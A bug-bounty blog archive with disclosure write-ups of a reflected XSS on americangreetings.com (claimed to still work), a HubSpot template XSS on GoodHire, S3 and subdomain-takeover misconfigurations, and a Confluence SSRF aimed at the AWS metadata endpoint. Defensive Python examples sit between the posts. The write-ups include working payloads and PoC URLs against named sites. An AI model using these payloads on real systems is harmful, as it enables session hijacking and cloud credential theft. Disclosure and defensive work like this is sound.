Feb 26, 2019

[Still works] Redirect on Yahoo Subdomain to Reflected XSS on americangreetings.com

Bug Type : Reflected XSS
Affected Site : americangreetings.com
Yahoo Subdomain : greetings.yahoo.com


Description
I've reported this to Yahoo and American Greetings but it was marked as informative,
so they don't mind if I disclose it.

This XSS still works.

I've found that the Yahoo subdomain greetings.yahoo.com can be redirected to any path on americangreetings.com.

So I tried to get a reflected XSS on americangreetings.com in those paths.

The XSS affected this path:
/search-results/{xss payload}

************************************
The fix I suggested to Yahoo was
to do it like
greetings.yahoo.ca,
which redirects only to the site home.

***************************************

PoC links :

http://greetings.yahoo.com/search-results/'"--><Details Open OnToggle=confirm`Haron`>

https://www.americangreetings.com/search-results/'%22--%3e%3cDetails%20Open%20OnToggle=confirm%60Haron%60%3e
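The fix suggested above (always land on the site home, as greetings.yahoo.ca does) can be compared with the pass-through behaviour in a few lines. The Python below is an added example, not code from this post or from Yahoo; it assumes a redirect handler that receives the request path and returns the Location value. The `redirect_if_plain_path` variant is a hypothetical middle ground, not the fix the post proposes.

```python
import re
from urllib.parse import urlsplit

# Destination of the redirect (taken from the PoC links above).
TARGET_ORIGIN = "https://www.americangreetings.com"

# Hypothetical "plain path" shape: only letters, digits, '-', '_' and '/'.
# Anything else (quotes, angle brackets, percent sequences) fails the match.
SAFE_PATH = re.compile(r"^/[A-Za-z0-9_/-]*$")


def redirect_passthrough(request_path: str) -> str:
    """Weak behaviour: forward the incoming path unchanged, so whatever a
    visitor appends to the trusted host name reaches the target site verbatim."""
    return TARGET_ORIGIN + request_path


def redirect_home_only(request_path: str) -> str:
    """The fix suggested above (what greetings.yahoo.ca does): always land on
    the target's home page, regardless of the path that arrived."""
    return TARGET_ORIGIN + "/"


def redirect_if_plain_path(request_path: str) -> str:
    """Assumed middle ground, not the post's proposal: keep the path only when
    it is made of plain path characters; otherwise fall back to the home page.
    The query string and fragment are never forwarded."""
    path = urlsplit(request_path).path
    if SAFE_PATH.match(path):
        return TARGET_ORIGIN + path
    return TARGET_ORIGIN + "/"


if __name__ == "__main__":
    # Constructed request paths: one ordinary, one carrying markup characters.
    for p in ("/search-results/birthday", "/search-results/<b>x</b>"):
        print(p, "->", redirect_passthrough(p), "|", redirect_home_only(p), "|", redirect_if_plain_path(p))
```

The point of the comparison is that the trusted host's reputation is attached to whatever the Location header carries: with pass-through, the reflected XSS on the target becomes reachable through a greetings.yahoo.com link; with home-only, nothing visitor-controlled survives the hop.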


*************************************


Feb 22, 2019

Creating AWS S3 Buckets

Amazon AWS S3 buckets are simple and can be created by anyone.

************************
Steps to create an S3 bucket

1) You must create an Amazon AWS account first (credit card required).
You enter your payment information so they can verify your identity. They will not charge you unless your usage exceeds the AWS Free Tier limits.

2) Creating a bucket is simple, as you see in the pic.

3) Enter your bucket name.
I've chosen HaronBucket.
Please remember this will be your bucket link,
example as mine:
haronbucket.s3.amazonaws.com
s3.amazonaws.com/haronbucket


Click Next, then Next again if you don't need any special config or permissions.

After clicking Create Bucket,
your bucket will be shown in the Buckets home.


**********************************
Now uploading your files is very easy:
1) Go to your buckets home.
2) Choose the bucket you want to upload files to,
or you can go to this link (add your bucket):
https://s3.console.aws.amazon.com/s3/buckets/your-bucket/

3) Click on Get Started and choose the files you want to upload :) then click Upload.

4) Your uploaded file will be shown in your bucket's files; click on the file you uploaded.

5) Click on Make Public and scroll down; you will see your file's public link.


Subdomain Misconfiguration Leads to Reading Arbitrary AWS S3 Buckets

Bug Type : Subdomain misconfiguration
Program : Private on HackerOne
Severity : P2 (High)
Bounty : $600 + $200 bonus
Subdomain : images.example.com

************************************
How I found this bug
It was simple: when I went directly to https://images.example.com I found it redirected to https://aws.amazon.com/s3/

So then I started looking for the CNAME, and it was
images.example.com  >  s3.amazonaws.com

Here was the bug. I've seen many companies make the same error:
developers must add an S3 bucket whitelist.

So now I can call any bucket on images.example.com

example : images.example.com/haron-bucket/




************************
Steps to find this error are very simple:
if the subdomain has the alias s3.amazonaws.com,
try adding your bucket directly under the subdomain,
example : subdomain.site.com/yourbucket/yourfile.html
If it loads, the subdomain is vulnerable; if not, this means the developers added a bucket whitelist.

******************************************


Please see this write-up for creating your bucket:
https://www.mohamedharon.com/2019/02/aws-s3-buckets-create.html
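To find this class of misconfiguration in your own DNS zone before someone else does, the following Python audit (an added example, not the author's tooling) classifies CNAME targets into bucket-specific S3 hostnames, generic S3 endpoints and everything else, and flags the generic ones. The record data is constructed; the regexes assume the `s3.amazonaws.com`, `s3-<region>.amazonaws.com` and `s3.<region>.amazonaws.com` endpoint shapes.

```python
import re

# Generic S3 endpoint shapes: s3.amazonaws.com, s3-us-west-2.amazonaws.com,
# s3.eu-west-1.amazonaws.com, s3.dualstack.us-east-1.amazonaws.com (at most two extra labels).
GENERIC_S3 = re.compile(r"^s3(?:[.-][a-z0-9-]+){0,2}\.amazonaws\.com$")

# Bucket-specific shapes: <bucket>.s3.amazonaws.com, <bucket>.s3.<region>.amazonaws.com.
BUCKET_S3 = re.compile(
    r"^(?P<bucket>[a-z0-9][a-z0-9.-]{1,61}[a-z0-9])\.s3(?:[.-][a-z0-9-]+){0,2}\.amazonaws\.com$"
)


def classify_target(target: str) -> str:
    """Return 'bucket-specific', 'generic' or 'other' for a CNAME target."""
    t = target.rstrip(".").lower()
    if BUCKET_S3.match(t):          # checked first: a bucket name may itself start with "s3"
        return "bucket-specific"
    if GENERIC_S3.match(t):
        return "generic"
    return "other"


def audit(records: dict) -> list:
    """Return (host, target) pairs whose CNAME is a generic S3 endpoint. As the
    post describes, any bucket is then reachable as https://<host>/<bucket>/
    unless something in front of S3 enforces a bucket allow-list."""
    return [(host, target) for host, target in records.items()
            if classify_target(target) == "generic"]


# Constructed zone data, not real DNS records.
SAMPLE_CNAMES = {
    "images.example.com": "s3.amazonaws.com",                       # the shape found in the post
    "static.example.com": "s3-us-west-2.amazonaws.com",             # generic regional endpoint
    "assets.example.com": "assets.example.com.s3.amazonaws.com",    # bucket-specific: fine
    "cdn.example.com":    "d111111abcdef8.cloudfront.net",          # not S3 at all
}


def flagged_hosts() -> list:
    return sorted(host for host, _ in audit(SAMPLE_CNAMES))


if __name__ == "__main__":
    for host, target in audit(SAMPLE_CNAMES):
        print(f"{host} -> {target}: generic S3 endpoint, any bucket reachable by path")
```

Run it against an export of your zone (one CNAME per entry) and confirm each flagged host with the request the post describes; the fix is a CNAME to the bucket's own hostname or a proxy that only forwards the buckets you own.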




*********************************************************


Feb 18, 2019

2 Subdomain Takeovers via Unbounce in a Private Program

Many researchers asked me whether this takeover still exists or has been fixed.
Yes, this takeover still exists, with 3 scenarios,
as Akita Zen said.


*****************************
Bug Type : Subdomain Takeover 
Service : Unbounce 
Severity : Critical 
Program : Private on Hackerone
Status : Duplicate after fixing it

*************************
In a private program on HackerOne I found 2 subdomains,
get.example.com
try.example.com
which had a CNAME pointing to unbouncepages.com
and showed me the takeover error (fingerprint).
So I made an account and tried to add the domain to my page on Unbounce, and it connected successfully.


Steps to takeover
1) Create an account on Unbounce with a credit card.
2) Create your Unbounce page.
3) Add a domain to your page.
If it tells you the domain is already taken, this means there is no takeover.
example : info.hacker.one
It shows us the takeover fingerprint, but it already works and was added to another account, so there is no takeover in it.




Timeline
Reported : 6 Nov, 2018
Triaged : 7 Nov, 2018
I noticed that they fixed it : 7 Nov, 2018, after 2 hours
Duplicate : 10 Nov, 2018


******************************

Feb 17, 2019

Reflected XSS in GoodHire.com CMS

Program : Inflection
Bug Type : Reflected XSS
Severity : High
Domain : GoodHire.com
Bounty : $0 + $150 bonus

******************************
The affected parameter was in the HubSpot CMS:
referrerUrl
Affected path:
/_hcms/cta

**********************************
Payload
{%25+macro+field()+%25}moc.okok//:ptth//)niamod.tnemucod(trela:tpircsavaj=daolno+gvshttp://http:""//{%25+endmacro+%25}{{+field(1)%7curlize%7creverse%7curlize%7creverse%7curlize%7creverse+}}


**********************************
PoC was :
https://www.goodhire.com/_hcms/cta?referrerUrl={%25+macro+field()+%25}moc.okok//:ptth//)niamod.tnemucod(trela:tpircsavaj=daolno+gvshttp://http:%22%22//{%25+endmacro+%25}{{+field(1)%7curlize%7creverse%7curlize%7creverse%7curlize%7creverse+}}
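A payload like the one above only works because template delimiters reach the CMS through a query parameter, so the practical detection on the defending side is to decode each parameter and look for `{{`, `{%`, `}}` or `%}`. The Python below is an added example, not part of this write-up or of HubSpot; it parses constructed access-log lines in common log format and reports the offending request and parameter. The payload in the second sample line is a shortened, constructed variant of the one above.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Common log format request line; only the fields the check needs are captured.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Delimiters of HubL / Jinja-style template syntax. A value that still contains
# them after decoding is template code, not a URL.
TEMPLATE_MARKERS = ("{{", "{%", "}}", "%}")


def fully_decoded(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding (the payload above hides '%' as '%25')."""
    for _ in range(rounds):
        nxt = unquote_plus(value)
        if nxt == value:
            break
        value = nxt
    return value


def suspicious_params(target: str) -> list:
    """Names of query parameters whose decoded value contains a template delimiter."""
    query = urlsplit(target).query
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if any(marker in fully_decoded(value) for marker in TEMPLATE_MARKERS)]


def detect(lines) -> list:
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        for param in suspicious_params(m["target"]):
            findings.append({"ip": m["ip"], "ts": m["ts"],
                             "path": urlsplit(m["target"]).path, "param": param})
    return findings


# Constructed access-log lines. The second carries a shortened variant of the
# payload shape shown above; the third has braces in the path but no template syntax.
LOG_LINES = [
    '203.0.113.5 - - [17/Feb/2019:10:00:01 +0000] "GET /_hcms/cta?referrerUrl=https://www.goodhire.com/pricing HTTP/1.1" 200 512',
    '203.0.113.7 - - [17/Feb/2019:10:00:03 +0000] "GET /_hcms/cta?referrerUrl={%25+macro+f()+%25}x{%25+endmacro+%25}{{+f(1)%7creverse+}} HTTP/1.1" 200 734',
    '198.51.100.9 - - [17/Feb/2019:10:00:05 +0000] "GET /docs/%7Bid%7D?lang=en HTTP/1.1" 200 201',
]


def run_sample() -> list:
    return detect(LOG_LINES)


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f['ts']} {f['ip']} template syntax in {f['param']} on {f['path']}")
```

Detection is the second line of defence; the first is to treat `referrerUrl` as data (validate it as an http(s) URL and escape it on output) so the template engine never evaluates it.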


***********************************
For more about this bug please visit my write-up.
****************************************

Feb 16, 2019

Subdomain Takeover via Wufoo Service in a Private Program

Program : Private Program on HackerOne
Bug Type : Subdomain Takeover
Service : Wufoo
Severity : Medium (because it redirects)
Reward : $500
Subdomain : bug.example.com

*********************************
Wufoo 
Wufoo's HTML form builder helps you create online web forms. Use our web form creator to power your contact forms, online surveys, and event registrations.

*************************************
Steps and how I found this bug

When I went directly to the subdomain,
it redirected me to another subdomain and showed me this error.


First I noticed "Profile Not found",
so I searched about Wufoo to see what it does.

1) When you create a free profile on Wufoo,
they give you a subdomain for your profile:

yourprofile.wufoo.com

2) You can change it later, so I changed it to the subdomain's CNAME, which was not found.

3) Created a form to provide more PoC.


4) This PoC seems enough; if you want to add a page or JavaScript code
you will have to upgrade your free account.




**********************************

Feb 15, 2019

Subdomain Takeover via HubSpot

Last year I was able to take over a subdomain in a public program via the HubSpot service, and after that the program closed my report as informative through a HackerOne staff member.

Some researchers say "You can't take over subdomains via HubSpot any more" after the report by Frans Rosén https://hackerone.com/reports/38007; that was 4 years ago and it seems that HubSpot fixed their DNS services.

In this blog post I only want to say and prove that
HubSpot is still vulnerable to subdomain takeovers.

In my report I was able to bypass the DNS confirmation and make the subdomain connect directly to my new DNS.

Subdomain Takeover via HubSpot Fingerprint

POC





*************************************

Souq.com Subdomain Takeover via jazzhr.com service

Program :  Souq

Vulnerability : Subdomain Takeover

Impact  : High


`jobs.souq.com` was vulnerable to subdomain takeover via the `jazzhr.com` service.

When I visited jobs.souq.com it showed me an error (fingerprint).


So I started to look at the CNAME:
`jobs.souq.com` had the CNAME `souq.applytojob.com`

So I went directly to the service provider and they allowed me to take the CNAME `souq.applytojob.com`.



`jobs.souq.com` did not allow me to connect it directly; seems there was a bug!

After 1 day I noticed that the subdomain had been connected to the CNAME on some paths, example : `/app/share/`



Funny thing, there is someone applying to a fake Security job! 😀

Timeline
2019-02-04: Bug reported
2019-01-05: Fixed with no comments
2019-01-06: Closed as Informative!
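The Unbounce, Wufoo, HubSpot and JazzHR cases above share one shape: a subdomain whose CNAME points at a third-party service name that the organisation no longer controls. The Python below is an added example, not the author's tooling, showing how a defender can audit a zone for that shape offline. The zone entries, the resolver and the fetched page bodies are all constructed; the only error fingerprint used is the "Profile Not found" text quoted in the Wufoo post, and since the HubSpot CNAME target is not given on this page it is not included.

```python
# Third-party CNAME targets named in the posts above, mapped to the service.
SERVICE_DOMAINS = {
    "unbouncepages.com": "Unbounce",
    "wufoo.com": "Wufoo",
    "applytojob.com": "JazzHR",
}

# Error text a service shows for a name nobody has claimed. Only the Wufoo
# string appears in the posts above (as the author quoted it); exact wording
# on a live service may differ, so treat this table as operator-maintained.
FINGERPRINTS = {
    "Wufoo": "Profile Not found",
}


def service_for(target: str):
    """Return the service name if the CNAME target belongs to a known provider."""
    t = target.rstrip(".").lower()
    for suffix, name in SERVICE_DOMAINS.items():
        if t == suffix or t.endswith("." + suffix):
            return name
    return None


def classify(subdomain: str, target: str, resolves, fetch_body) -> str:
    """Classify one CNAME record:
       dangling          - target name does not resolve at all
       unclaimed:<svc>   - third-party target and the page shows the provider's 'not found' text
       third-party:<svc> - third-party target; confirm your account still owns that name
       ok                - in-house target"""
    if not resolves(target):
        return "dangling"
    service = service_for(target)
    if service is None:
        return "ok"
    body = (fetch_body(subdomain) or "").lower()
    fingerprint = FINGERPRINTS.get(service)
    if fingerprint and fingerprint.lower() in body:
        return f"unclaimed:{service}"
    return f"third-party:{service}"


def audit(zone: dict, resolves, fetch_body) -> dict:
    return {sub: classify(sub, target, resolves, fetch_body) for sub, target in zone.items()}


# Constructed zone. Targets for Unbounce and Wufoo are made up; the JazzHR
# target is the one named in the Souq post.
ZONE = {
    "get.example.com": "unbouncepages.com",
    "bug.example.com": "example-profile.wufoo.com",
    "jobs.souq.com": "souq.applytojob.com",
    "old.example.com": "retired-host.example.net",
    "www.example.com": "origin.example.com",
}
# Constructed resolver answers and fetched bodies, standing in for DNS and HTTP.
RESOLVABLE = {"unbouncepages.com", "example-profile.wufoo.com",
              "souq.applytojob.com", "origin.example.com"}
BODIES = {"bug.example.com": "<h1>Profile Not found</h1>"}


def run_sample() -> dict:
    return audit(ZONE, lambda host: host in RESOLVABLE, BODIES.get)


if __name__ == "__main__":
    for sub, verdict in run_sample().items():
        print(f"{sub:20} {verdict}")
```

In a real run, `resolves` and `fetch_body` would wrap a DNS lookup and an HTTP GET. A "third-party" verdict is not a finding by itself, which is the lesson of the info.hacker.one example above: the name may show the provider's error page yet already be attached to the right account. The record to act on is the one where nobody in the organisation can point to the account that owns the target; the remediation is to remove the CNAME when the service is retired.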




Feb 14, 2019

[SSRF] Server-Side Request Forgery in a Private Program, developers.example.com

*****************************************

Program : Private program (HackerOne)
Subdomain : developers.example.com
Bounty : $200
Severity : Critical
Issue Type : SSRF

****************************************

I've found an SSRF vulnerability in a private program on HackerOne.

The affected subdomain (developers) was running a
vulnerable Confluence instance, version <= 6.00.

POC example :

developers.example.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com

****************************

Any AWS instance can query an IP and receive information related to that instance and even account information. I then checked the local hostname through the AWS metadata endpoint by visiting
http://169.254.169.254/latest/meta-data/local-hostname/


developers.example.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/
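The application-side fix for this class of bug is to validate a URL such as `consumerUri` before fetching it: allow only http(s), resolve the host, and refuse any address in link-local (where 169.254.169.254 lives), loopback or private ranges. The Python below is an added example, not Confluence code or the author's; the DNS answers are a constructed map so it runs offline, and the blocked-range list is an assumed baseline a deployment would tune.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = ("http", "https")

# Ranges an outbound fetch must never reach. 169.254.0.0/16 covers the
# instance metadata address 169.254.169.254. Assumed baseline; tune per deployment.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
    "::/128", "::1/128", "fe80::/10", "fc00::/7",
)]


def is_blocked(ip) -> bool:
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped          # ::ffff:a.b.c.d is the same host as a.b.c.d
    return any(ip in net for net in BLOCKED_NETWORKS)


def check_outbound_url(url: str, resolve):
    """Return (allowed, reason). `resolve(host)` yields the IP strings the host
    maps to; every answer must be outside the blocked ranges."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addrs = [ipaddress.ip_address(host)]       # literal IP in the URL
    except ValueError:
        addrs = [ipaddress.ip_address(a) for a in resolve(host)]
    if not addrs:
        return False, f"{host} does not resolve"
    for ip in addrs:
        if is_blocked(ip):
            return False, f"{host} -> {ip} is in a blocked range"
    return True, "ok"


# Constructed DNS answers so the check runs offline (the addresses are not real).
CONSTRUCTED_DNS = {
    "google.com": ["203.0.113.20"],
    "metadata.internal.test": ["169.254.169.254"],   # a name that points back at the metadata service
}


def sample_resolver(host: str) -> list:
    return CONSTRUCTED_DNS.get(host.lower(), [])


if __name__ == "__main__":
    for u in ("http://google.com/",
              "http://169.254.169.254/latest/meta-data/",
              "http://metadata.internal.test/latest/meta-data/",
              "ftp://google.com/"):
        print(u, check_outbound_url(u, sample_resolver))
```

Two details matter when wiring this into a real fetch: connect to the address you validated rather than resolving the name a second time (otherwise the answer can change between check and use), and apply the same check to every redirect the fetch follows.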